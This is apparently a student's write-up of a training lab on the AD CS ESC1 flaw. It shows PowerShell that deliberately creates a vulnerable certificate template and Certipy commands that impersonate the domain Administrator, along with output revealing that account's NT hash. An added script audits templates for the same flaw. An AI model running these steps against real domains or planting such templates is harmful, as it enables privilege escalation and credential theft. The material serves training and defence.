---
# System prepended metadata

title: Lab 5.3 Integration

---

# Lab 5.3 Integration
## I. Overall Plan
### Phase 1: Set up DC01 (hiboxy.com)
- Confirm the CA name and configuration
- Create the user `bgreen` with the password `Password1`
- Create the `UserAuthenticationCertificate` template with an ESC1-vulnerable configuration
### Phase 2: Set up Windows 10 (Attacker)
- Configure DNS
- Confirm Certify.exe is available in `\Tools\`
- Run Certify to reproduce the workbook's results
### Phase 3: Set up Slingshot Linux (Attacker)
- Confirm Certipy is installed
- Run Certipy find, req, auth
- Obtain the NT hash of Administrator
## II. Execution
### Phase 1: Create the ESC1-vulnerable template on DC01
- Create the `UserAuthenticationCertificate` template with the ESC1 configuration:
```powershell=
$ConfigContext = ([ADSI]"LDAP://RootDSE").configurationNamingContext
$TemplateContainer = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigContext"

# Get the built-in User template to copy from
$BaseTemplate = $TemplateContainer.Children | Where-Object {$_.cn -eq "User"}

# Create the new template object
$NewTemplate = $TemplateContainer.Create("pKICertificateTemplate", "CN=UserAuthenticationCertificate")

# Copy the individual attributes from the User template
$NewTemplate.Put("flags", $BaseTemplate.psbase.Properties["flags"].Value)
$NewTemplate.Put("revision", $BaseTemplate.psbase.Properties["revision"].Value)
$NewTemplate.Put("pKIDefaultKeySpec", $BaseTemplate.psbase.Properties["pKIDefaultKeySpec"].Value)
$NewTemplate.Put("pKIKeyUsage", $BaseTemplate.psbase.Properties["pKIKeyUsage"].Value)
$NewTemplate.Put("pKIMaxIssuingDepth", $BaseTemplate.psbase.Properties["pKIMaxIssuingDepth"].Value)
$NewTemplate.Put("pKICriticalExtensions", $BaseTemplate.psbase.Properties["pKICriticalExtensions"].Value)
$NewTemplate.Put("pKIExpirationPeriod", $BaseTemplate.psbase.Properties["pKIExpirationPeriod"].Value)
$NewTemplate.Put("pKIOverlapPeriod", $BaseTemplate.psbase.Properties["pKIOverlapPeriod"].Value)
$NewTemplate.Put("pKIExtendedKeyUsage", $BaseTemplate.psbase.Properties["pKIExtendedKeyUsage"].Value)
$NewTemplate.Put("pKIDefaultCSPs", $BaseTemplate.psbase.Properties["pKIDefaultCSPs"].Value)
$NewTemplate.Put("msPKI-Private-Key-Flag", $BaseTemplate.psbase.Properties["msPKI-Private-Key-Flag"].Value)
$NewTemplate.Put("msPKI-Minimal-Key-Size", $BaseTemplate.psbase.Properties["msPKI-Minimal-Key-Size"].Value)
$NewTemplate.Put("msPKI-Template-Schema-Version", 2)
$NewTemplate.Put("msPKI-Template-Minor-Revision", $BaseTemplate.psbase.Properties["msPKI-Template-Minor-Revision"].Value)
# Every template needs a unique OID under the forest's template OID arc
$NewTemplate.Put("msPKI-Cert-Template-OID", "1.3.6.1.4.1.311.21.8.$(Get-Random -Minimum 1000000 -Maximum 9999999).$(Get-Random -Minimum 1000000 -Maximum 9999999)")

# Set the ESC1-vulnerable values
$NewTemplate.Put("displayName", "UserAuthenticationCertificate")
$NewTemplate.Put("msPKI-Certificate-Name-Flag", 1)    # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1)
$NewTemplate.Put("msPKI-Enrollment-Flag", 40)          # AUTO_ENROLLMENT (0x20) + PUBLISH_TO_DS (0x8); manager approval (0x2) not set
$NewTemplate.Put("msPKI-RA-Signature", 0)              # No authorized signatures required

$NewTemplate.SetInfo()
Write-Host "Template created successfully!"
```
- Set permissions for Domain Users
```powershell=
# Look up the template created above
$ConfigContext = ([ADSI]"LDAP://RootDSE").configurationNamingContext
$TemplateContainer = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigContext"
$NewTemplate = $TemplateContainer.Children | Where-Object {$_.cn -eq "UserAuthenticationCertificate"}

# SID of Domain Users in this lab domain (domain SID + RID 513)
$DomainUsersSID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1165364801-2165540956-2109386109-513")

# Grant the Enroll extended right to Domain Users
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $DomainUsersSID,
    [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
    [System.Security.AccessControl.AccessControlType]::Allow,
    [GUID]"0e10c968-78fb-11d2-90d4-00c04f79dc55"    # Certificate-Enrollment control access right
)

$NewTemplate.psbase.ObjectSecurity.AddAccessRule($ACE)
$NewTemplate.psbase.CommitChanges()
Write-Host "Permissions set successfully!"
```
- Publish the template to the CA
```powershell=
# Publish the template on the lab CA
$CAName = "DC01.hiboxy.com\hiboxy-CA01-CA"
certutil -config $CAName -setcatemplates +UserAuthenticationCertificate
```
- Verify the result: `certutil -catemplates` ![image](https://hackmd.io/_uploads/S1eNkxfKWl.png)
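The template above combines the three conditions that make ESC1 possible (enrollee supplies the subject, no manager approval or RA signatures, an EKU that permits client authentication) with an Enroll right for a broad group. The audit script below is an added example, not part of the lab or workbook; it enumerates every template in the Configuration partition and reports the ones that match that pattern, so the lab template can be found and remediated after the exercise. It assumes a domain-joined host with read access to the Configuration partition (DC01 in this lab).

```powershell
# Added audit example (not the lab's code): report templates matching the ESC1 pattern.
$ConfigContext = ([ADSI]"LDAP://RootDSE").configurationNamingContext
$PkiServices   = "CN=Public Key Services,CN=Services,$ConfigContext"
$Templates     = [ADSI]"LDAP://CN=Certificate Templates,$PkiServices"

# Templates currently published on at least one CA (certificateTemplates of each pKIEnrollmentService)
$Published = @()
foreach ($ca in ([ADSI]"LDAP://CN=Enrollment Services,$PkiServices").Children) {
    $Published += @($ca.Properties["certificateTemplates"])
}

# EKUs usable for domain authentication: Client Auth, Smart Card Logon, PKINIT Client Auth, Any Purpose
$AuthEkus = "1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.2.3.4", "2.5.29.37.0"
# Principals whose Enroll right makes a template reachable by any low-privileged account
$DomainSid = (New-Object System.Security.Principal.NTAccount("Domain Users")).Translate(
    [System.Security.Principal.SecurityIdentifier]).AccountDomainSid.Value
$BroadSids  = "S-1-1-0", "S-1-5-11", "$DomainSid-513", "$DomainSid-515"   # Everyone, Authenticated Users, Domain Users, Domain Computers
$EnrollGuid = [GUID]"0e10c968-78fb-11d2-90d4-00c04f79dc55"                # Certificate-Enrollment control access right
$AdRights   = [System.DirectoryServices.ActiveDirectoryRights]

foreach ($t in $Templates.Children) {
    $p = $t.Properties
    $supplies = ([int]$p["msPKI-Certificate-Name-Flag"].Value -band 0x1) -ne 0   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    $approval = ([int]$p["msPKI-Enrollment-Flag"].Value -band 0x2) -ne 0         # CT_FLAG_PEND_ALL_REQUESTS (manager approval)
    $raSigs   = [int]$p["msPKI-RA-Signature"].Value
    $ekus     = @($p["pKIExtendedKeyUsage"])
    $authEku  = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)

    # Allow ACEs from broad principals that grant Enroll (explicit GUID, all extended rights, or GenericAll)
    $broadEnroll = @($t.psbase.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object {
            $_.AccessControlType -eq "Allow" -and $BroadSids -contains $_.IdentityReference.Value -and (
                (($_.ActiveDirectoryRights -band $AdRights::GenericAll) -eq $AdRights::GenericAll) -or
                ((($_.ActiveDirectoryRights -band $AdRights::ExtendedRight) -ne 0) -and
                 ($_.ObjectType -eq $EnrollGuid -or $_.ObjectType -eq [GUID]::Empty))
            )
        })

    if ($supplies -and -not $approval -and $raSigs -eq 0 -and $authEku -and $broadEnroll.Count -gt 0) {
        [PSCustomObject]@{
            Template  = $p["cn"].Value
            Published = ($Published -contains $p["cn"].Value)   # only published templates are issuable
            EnrollBy  = ($broadEnroll.IdentityReference.Value | Sort-Object -Unique) -join ", "
        }
    }
}
```

On this lab domain the script should list `UserAuthenticationCertificate` as published and enrollable by the Domain Users SID; clearing bit 0x1 of `msPKI-Certificate-Name-Flag` or setting bit 0x2 of `msPKI-Enrollment-Flag` (manager approval) on that template makes it drop out of the report.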
### Phase 2: Set up Windows 10 (Attacker)
- Update the DNS rule with the DC's correct IP:
```powershell=
# Remove the old rule
Get-DnsClientNrptRule | Where-Object {$_.Namespace -contains "hiboxy.com"} | Remove-DnsClientNrptRule -Force

# Add a new rule pointing at DC01 = 10.130.10.10
Add-DnsClientNrptRule -Namespace "hiboxy.com" -NameServers 10.130.10.10

# Check DNS resolution
Resolve-DnsName hiboxy.com
Resolve-DnsName dc01.hiboxy.com
```
![image](https://hackmd.io/_uploads/rJj2eeGFZl.png)
- From an elevated PowerShell, run `runas /user:hiboxy.com\bgreen /netonly cmd.exe` with the password `Password1`
- In the newly opened CMD (running as bgreen), run Certify to list the CAs: `\Tools\Certify.exe cas /domain:hiboxy.com` ![image](https://hackmd.io/_uploads/ryad-xfYbx.png)
- Find vulnerable templates: `\Tools\Certify.exe find /vulnerable /domain:hiboxy.com` ![image](https://hackmd.io/_uploads/B13T-lzt-l.png)
### Phase 3: Slingshot Linux
- Run in the terminal: `certipy find -u bgreen@hiboxy.com -password Password1 -dc-ip 10.130.10.10` ![image](https://hackmd.io/_uploads/rJFQMeGF-x.png)
- Inspect the UserAuthenticationCertificate template
    - `cat *_Certipy.txt | grep -A 18 UserAuthenticationCertificate`
    - `cat *_Certipy.txt | grep -A 40 UserAuthenticationCertificate`
    - `grep "CA Name" *_Certipy.txt`
- Result:
```bash=
sec560@slingshot:~$ sudo su
root@slingshot:/home/sec560# cat *_Certipy.txt | grep -A 18 UserAuthenticationCertificate
    Template Name                       : UserAuthenticationCertificate
    Display Name                        : UserAuthenticationCertificate
    Certificate Authorities             : hiboxy-CA01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
root@slingshot:/home/sec560# cat *_Certipy.txt | grep -A 40 UserAuthenticationCertificate
    Template Name                       : UserAuthenticationCertificate
    Display Name                        : UserAuthenticationCertificate
    Certificate Authorities             : hiboxy-CA01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HIBOXY.COM\Domain Users
      Object Control Permissions
        Owner                           : HIBOXY.COM\Enterprise Admins
        Full Control Principals         : HIBOXY.COM\Domain Admins
                                          HIBOXY.COM\Local System
                                          HIBOXY.COM\Enterprise Admins
        Write Owner Principals          : HIBOXY.COM\Domain Admins
                                          HIBOXY.COM\Local System
                                          HIBOXY.COM\Enterprise Admins
        Write Dacl Principals           : HIBOXY.COM\Domain Admins
                                          HIBOXY.COM\Local System
                                          HIBOXY.COM\Enterprise Admins
        Write Property Principals       : HIBOXY.COM\Domain Admins
                                          HIBOXY.COM\Local System
                                          HIBOXY.COM\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'HIBOXY.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
  1
    Template Name                       : KerberosAuthentication
root@slingshot:/home/sec560# grep "CA Name" *_Certipy.txt
    CA Name                             : hiboxy-CA01-CA
```
- Set up DNS
```bash=
echo "nameserver 10.130.10.10" | sudo tee /etc/resolv.conf
nslookup dc01.hiboxy.com
nslookup hiboxy.com
```
- Request a certificate impersonating Administrator
```bash=
certipy req -username bgreen@hiboxy.com -password Password1 \
  -ca hiboxy-CA01-CA \
  -template UserAuthenticationCertificate \
  -upn administrator@hiboxy.com \
  -target 10.130.10.10
```
- Result:
```bash=
root@slingshot:/home/sec560# certipy req -username bgreen@hiboxy.com -password Password1 \
>   -ca hiboxy-CA01-CA \
>   -template UserAuthenticationCertificate \
>   -upn administrator@hiboxy.com \
>   -target 10.130.10.10
Certipy v4.4.0 - by Oliver Lyak (ly4k)
/usr/local/lib/python3.6/dist-packages/OpenSSL/_util.py:6: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography. The next release of cryptography will remove support for Python 3.6.
  from cryptography.hazmat.bindings.openssl.binding import Binding
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@hiboxy.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
- Obtain the NT hash of Administrator: `certipy auth -pfx administrator.pfx -dc-ip 10.130.10.10`
```bash=
root@slingshot:/home/sec560# certipy auth -pfx administrator.pfx -dc-ip 10.130.10.10
Certipy v4.4.0 - by Oliver Lyak (ly4k)
/usr/local/lib/python3.6/dist-packages/certipy/lib/certificate.py:13: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography. The next release of cryptography will remove support for Python 3.6.
  from cryptography import x509
[*] Using principal: administrator@hiboxy.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hiboxy.com': aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33
root@slingshot:/home/sec560#
```
- Lab 5.3 completed following the workbook instructions!
